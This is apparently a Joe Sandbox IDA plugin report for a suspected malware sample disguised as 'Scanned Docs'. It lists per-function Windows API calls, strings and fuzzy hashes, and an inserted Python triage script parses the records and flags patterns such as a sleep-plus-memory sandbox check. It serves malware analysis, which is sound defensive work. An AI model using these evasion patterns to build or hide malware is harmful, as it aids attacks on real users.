                                                      • GetLastError.KERNEL32(?,002B301A,002813C6,00000000,00000000,00000000,?,002B328B,00000006,FlsSetValue,00322290,FlsSetValue,00000000,00000364,?,002B2E46), ref: 002B30B1
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002B301A,002813C6,00000000,00000000,00000000,?,002B328B,00000006,FlsSetValue,00322290,FlsSetValue,00000000), ref: 002B30BF
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 002E747F
                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 002E7497
                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002E74AC
                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 002E74CA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Similarity
                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                      • String ID:
                                                      • API String ID: 1352324309-0
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,002EACD3,?,00008000), ref: 002EB0C4
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,002EACD3,?,00008000), ref: 002EB0E9
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,002EACD3,?,00008000), ref: 002EB0F3
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,002EACD3,?,00008000), ref: 002EB126
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID:
                                                      • API String ID: 2875609808-0
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 002E2DC5
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 002E2DD6
                                                      • GetCurrentThreadId.KERNEL32 ref: 002E2DDD
                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 002E2DE4
                                                      Similarity
                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 2710830443-0
                                                      APIs
                                                        • Part of subcall function 00299639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00299693
                                                        • Part of subcall function 00299639: SelectObject.GDI32(?,00000000), ref: 002996A2
                                                        • Part of subcall function 00299639: BeginPath.GDI32(?), ref: 002996B9
                                                        • Part of subcall function 00299639: SelectObject.GDI32(?,00000000), ref: 002996E2
                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00318887
                                                      • LineTo.GDI32(?,?,?), ref: 00318894
                                                      • EndPath.GDI32(?), ref: 003188A4
                                                      • StrokePath.GDI32(?), ref: 003188B2
                                                      Similarity
                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                      • String ID:
                                                      • API String ID: 1539411459-0
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 002998CC
                                                      • SetTextColor.GDI32(?,?), ref: 002998D6
                                                      • SetBkMode.GDI32(?,00000001), ref: 002998E9
                                                      • GetStockObject.GDI32(00000005), ref: 002998F1
                                                      Similarity
                                                      • API ID: Color$ModeObjectStockText
                                                      • String ID:
                                                      • API String ID: 4037423528-0
                                                      APIs
                                                      • GetCurrentThread.KERNEL32 ref: 002E1634
                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,002E11D9), ref: 002E163B
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002E11D9), ref: 002E1648
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,002E11D9), ref: 002E164F
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 002DD858
                                                      • GetDC.USER32(00000000), ref: 002DD862
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002DD882
                                                      • ReleaseDC.USER32(?), ref: 002DD8A3
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 002DD86C
                                                      • GetDC.USER32(00000000), ref: 002DD876
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002DD882
                                                      • ReleaseDC.USER32(?), ref: 002DD8A3
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      APIs
                                                        • Part of subcall function 00287620: _wcslen.LIBCMT ref: 00287625
                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 002F4ED4
                                                      Strings
                                                      Similarity
                                                      • API ID: Connection_wcslen
                                                      • String ID: *$LPT
                                                      • API String ID: 1725874428-3443410124
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 002AE30D
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      APIs
                                                      • CharUpperBuffW.USER32(002D569E,00000000,?,0031CC08,?,00000000,00000000), ref: 003078DD
                                                        • Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A
                                                      • CharUpperBuffW.USER32(002D569E,00000000,?,0031CC08,00000000,?,00000000,00000000), ref: 0030783B
                                                      Strings
                                                      Similarity
                                                      • API ID: BuffCharUpper$_wcslen
                                                      • String ID: <s4
                                                      • API String ID: 3544283678-4153809766
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 0029F2A2
                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 0029F2BB
                                                      Strings
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      • Opcode ID: 339079f61b52ee1910eab697a275704724ba7ac683da8dade6b33a1cf238ac56
                                                      • Instruction ID: 3cd63e09f668766455e89a8202b5ff5d67a307974234afe77f6144ab1c8fa39f
                                                      • Opcode Fuzzy Hash: 339079f61b52ee1910eab697a275704724ba7ac683da8dade6b33a1cf238ac56
                                                      • Instruction Fuzzy Hash: 665138714197449BE320AF10E886BABBBF8FF94304F91885DF199511A5EB308539CB66
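The records on this page list, per function, the imported APIs the IDA plugin resolved (with the recovered argument values and call-site address) plus the opcode and instruction fuzzy hashes used for similarity lookups. The following is an added example and is not part of the Joe Sandbox report or its IDA plugin: a small Python triage script that parses records in exactly this layout, decodes the dwCreationFlags argument of the CreateProcessW call recorded further down (the value 0x00000020), and flags API sets that co-occur in one function, such as Sleep beside GlobalMemoryStatusEx. The sample records are copied from this page; the heuristic rules, the flag table and every function and class name are the example's own assumptions.

```python
"""Parse the Joe Sandbox per-function records above and flag API combinations a reverser would triage first."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: three records excerpted from the report above (the "Memory Dump
# Source" lines are omitted, and the last record is truncated on purpose).
SAMPLE = """\
APIs
• Sleep.KERNEL32(00000000), ref: 0029F2A2
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0029F2BB
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
APIs
  • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
• CharUpperBuffW.USER32(?,?,?), ref: 002E6CB6
• _wcslen.LIBCMT ref: 002E6CC2
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: STOP
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00353018,0035305C), ref: 003181BF
• CloseHandle.KERNEL32 ref: 003181D1
"""

# "• [Part of subcall function XXXX: ]Name.MODULE[(args)], ref: ADDR"
API_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<caller>[0-9A-F]+):\s+)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)\s*$")
FIELD_RE = re.compile(r"^\s*•\s+(?P<key>[A-Za-z ]+):\s*(?P<val>.*)$")  # "• API ID: ..."

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]     # raw hex arguments; "?" where the sandbox could not recover a value
    ref: str            # call-site address inside the dumped image
    caller: str | None  # set for "Part of subcall function" lines, else None

@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)  # "API ID", "String ID", ...

    def api_names(self) -> set[str]:
        return {c.name for c in self.calls}

def parse_records(text: str) -> list[FunctionRecord]:
    """Start a new record at each bare "APIs" header; collect its calls and key/value lines."""
    records: list[FunctionRecord] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append(FunctionRecord())
        elif not records:
            continue  # tail of a record whose header precedes the excerpt
        elif m := API_RE.match(line):
            raw = m.group("args")
            records[-1].calls.append(ApiCall(m.group("name"), m.group("module"),
                                             raw.split(",") if raw is not None else [],
                                             m.group("ref"), m.group("caller")))
        elif m := FIELD_RE.match(line):
            records[-1].fields[m.group("key")] = m.group("val").strip()
    return records

# dwCreationFlags bits from winbase.h. The record above passes 0x20, which is
# NORMAL_PRIORITY_CLASS, not CREATE_SUSPENDED (0x4): no suspended child is created there.
CREATION_FLAGS = {0x00000004: "CREATE_SUSPENDED", 0x00000008: "DETACHED_PROCESS",
                  0x00000020: "NORMAL_PRIORITY_CLASS", 0x08000000: "CREATE_NO_WINDOW"}

def decode_creation_flags(call: ApiCall) -> list[str]:
    """Name the bits of CreateProcessW's 6th argument; [] if not CreateProcessW or unknown."""
    if call.name != "CreateProcessW" or len(call.args) < 6 or call.args[5] == "?":
        return []
    value = int(call.args[5], 16)
    return [name for bit, name in CREATION_FLAGS.items() if value & bit]

# Heuristics are this example's own, not Joe Sandbox signatures: API sets that co-occur in
# one function. Sleep beside a physical-RAM query is a classic low-memory VM fingerprint.
HEURISTICS = [
    (frozenset({"Sleep", "GlobalMemoryStatusEx"}), "sandbox check: delay + physical-RAM query"),
    (frozenset({"CreateProcessW"}), "spawns a process: check dwCreationFlags"),
]

def triage(text: str) -> list[dict]:
    """One row per record: API ID (None when truncated), direct calls, decoded flags, findings."""
    rows = []
    for rec in parse_records(text):
        rows.append({"api_id": rec.fields.get("API ID"),
                     "calls": [c.name for c in rec.calls if c.caller is None],
                     "flags": [f for c in rec.calls for f in decode_creation_flags(c)],
                     "findings": [d for need, d in HEURISTICS if need <= rec.api_names()]})
    return rows

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Because the report classifies the binary as a compiled AutoIt script, most of these functions belong to the AutoIt interpreter's runtime (the ComboBox, ListBox, edit and static control names are its GUI helpers), so a hit from such a heuristic shows that the runtime carries the capability, not that the embedded script exercises it; confirm against the behaviour sections of the report before treating an API pair as evidence.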
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 003057E0
                                                      • _wcslen.LIBCMT ref: 003057EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper_wcslen
                                                      • String ID: CALLARGARRAY
                                                      • API String ID: 157775604-1150593374
                                                      • Opcode ID: a56e0b4a7e5206f78b28047b38804ec3157dc169b439c0f074bdfe4c2255f924
                                                      • Instruction ID: ee8223246584d176ebb26f6f2cc8a0c79d73ddbc70e64f175ceab151036085b7
                                                      • Opcode Fuzzy Hash: a56e0b4a7e5206f78b28047b38804ec3157dc169b439c0f074bdfe4c2255f924
                                                      • Instruction Fuzzy Hash: 9841BD31A112099FCB05EFA9C8958BFBBB9FF59320F158069E905A7291E730DD81CF90
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 002FD130
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002FD13A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CrackInternet_wcslen
                                                      • String ID: |
                                                      • API String ID: 596671847-2343686810
                                                      • Opcode ID: c30ac637c7547972e72f86222f99fc95c72a385e78cd6c18475068ff7988efef
                                                      • Instruction ID: 1d4cef1476d76304d328bb914214cde67e29a5a038cd12f85eda57c2f3271137
                                                      • Opcode Fuzzy Hash: c30ac637c7547972e72f86222f99fc95c72a385e78cd6c18475068ff7988efef
                                                      • Instruction Fuzzy Hash: BD312A75D11109ABCF15EFA4CC85EEEBFBAFF05340F000029E919A61A1DB31A926DF50
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00313621
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0031365C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      • Opcode ID: d55a9adc962e4f1b90fc70773d758130971f07d0451135321dd0615487a5242b
                                                      • Instruction ID: f1fa2a2a33d3f793b33d57c3f2df64ca5c1251abd068caf1af1cc1b620e58bb1
                                                      • Opcode Fuzzy Hash: d55a9adc962e4f1b90fc70773d758130971f07d0451135321dd0615487a5242b
                                                      • Instruction Fuzzy Hash: 4F31BE71110204AEDB159F28DC80EFB73A9FF8C720F119619F8A597290DB34AD91CB60
                                                      APIs
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0031461F
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00314634
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: '
                                                      • API String ID: 3850602802-1997036262
                                                      • Opcode ID: 77fc33f8787844aa0efa39e4cb64cfc1aeb840e0be0f15e4932c9b1b6071d77b
                                                      • Instruction ID: c871729a3e7c0d9d43d23382ad606d595cf65f851f6a48a584472792b10b4679
                                                      • Opcode Fuzzy Hash: 77fc33f8787844aa0efa39e4cb64cfc1aeb840e0be0f15e4932c9b1b6071d77b
                                                      • Instruction Fuzzy Hash: 0C311A74A013099FDF19CF69C990BDABBBAFF49304F15406AE905AB351D770A941CF90
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0031327C
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00313287
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: e47df7f49d2a50ac836dfad623f3ac88b18758abc0a8f90aaa35ddfc7e18423e
                                                      • Instruction ID: 047ced56df808dd2ed132bca3e831e96269d134760cbe1678ab61bf875e236e2
                                                      • Opcode Fuzzy Hash: e47df7f49d2a50ac836dfad623f3ac88b18758abc0a8f90aaa35ddfc7e18423e
                                                      • Instruction Fuzzy Hash: 3011B2713002087FEF2AAF54DC84EFB77AEEB9C364F114524F9189B290D6319D928760
                                                      APIs
                                                        • Part of subcall function 0028600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0028604C
                                                        • Part of subcall function 0028600E: GetStockObject.GDI32(00000011), ref: 00286060
                                                        • Part of subcall function 0028600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0028606A
                                                      • GetWindowRect.USER32(00000000,?), ref: 0031377A
                                                      • GetSysColor.USER32(00000012), ref: 00313794
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: dead35ad07398590d8300ef3dfdf8e1500d69b93915846d891fed53e310c18ec
                                                      • Instruction ID: 2659386cace724f2c36f5309082aa47f2dd1c194528257ae56b35522ebc7d0b3
                                                      • Opcode Fuzzy Hash: dead35ad07398590d8300ef3dfdf8e1500d69b93915846d891fed53e310c18ec
                                                      • Instruction Fuzzy Hash: 8F113AB2610209AFDF06DFA8CC45EEA7BB8FB0C314F015514F955E2250D735E8519B50
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002FCD7D
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 002FCDA6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      • Opcode ID: 633ef8fe0d984347bcf0ee4f3859c3e3b7b54fbea5849e943a135e996719c0e0
                                                      • Instruction ID: fc258a7ae294e2fb8a925f6c5cf3c46a0dc9fdcbc61b4d1d00e5ffd3e3ee6b92
                                                      • Opcode Fuzzy Hash: 633ef8fe0d984347bcf0ee4f3859c3e3b7b54fbea5849e943a135e996719c0e0
                                                      • Instruction Fuzzy Hash: 9211A37126563EBAD7244E668D45EFBFEACEF127E4F204236B24982180D6B09851D6F0
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 003134AB
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003134BA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: 3a6e21c72a2944bf8ef9d7ee5a6ee88a0f21fa02ebe29ba026ac4a094fc3cf79
                                                      • Instruction ID: f87ecb415935dc766bb67a965f90eda3375f0806f822c9f37f53a1fcc4729a87
                                                      • Opcode Fuzzy Hash: 3a6e21c72a2944bf8ef9d7ee5a6ee88a0f21fa02ebe29ba026ac4a094fc3cf79
                                                      • Instruction Fuzzy Hash: 8011BC71100208AFEB278E65DC44AFB37AEEB19374F514324FA61931E0CB31DC919B60
                                                      APIs
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • CharUpperBuffW.USER32(?,?,?), ref: 002E6CB6
                                                      • _wcslen.LIBCMT ref: 002E6CC2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: STOP
                                                      • API String ID: 1256254125-2411985666
                                                      • Opcode ID: db3ad284b867e36e2b77a1457d811f1d60fc1e0f834ace0ddf97efa47fefd384
                                                      • Instruction ID: 322f435fb7909a32be8987f726bdec00d3e718c57e1c4eb4d3e6657df9e3dd24
                                                      • Opcode Fuzzy Hash: db3ad284b867e36e2b77a1457d811f1d60fc1e0f834ace0ddf97efa47fefd384
                                                      • Instruction Fuzzy Hash: 410108326705678BCB11AFFECC488BF73A5FA757507900525E45296191EA31D860C750
                                                      APIs
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                        • Part of subcall function 002E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 002E3CCA
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 002E1C46
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: f4f7172fbcbf94631f3e1d3add453d56af221d734e669a67d9d14e9f0da2e19d
                                                      • Instruction ID: b93d50d4f63f562282d0550c2cc30281880347a81d1a3b87c65b578afa78d670
                                                      • Opcode Fuzzy Hash: f4f7172fbcbf94631f3e1d3add453d56af221d734e669a67d9d14e9f0da2e19d
                                                      • Instruction Fuzzy Hash: 30012475AE11056BCB04FB90C9119FF73A89B15340F64102AE402B72C2EA219A388BB2
                                                      APIs
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                        • Part of subcall function 002E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 002E3CCA
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 002E1CC8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: 8b7b724c2268a47a9a5f4b62373217065c08bce2b550e6371771e037f93c5929
                                                      • Instruction ID: 25aed700b8461e8228dba8fb44430251532b1866315a296659eb57329aac2801
                                                      • Opcode Fuzzy Hash: 8b7b724c2268a47a9a5f4b62373217065c08bce2b550e6371771e037f93c5929
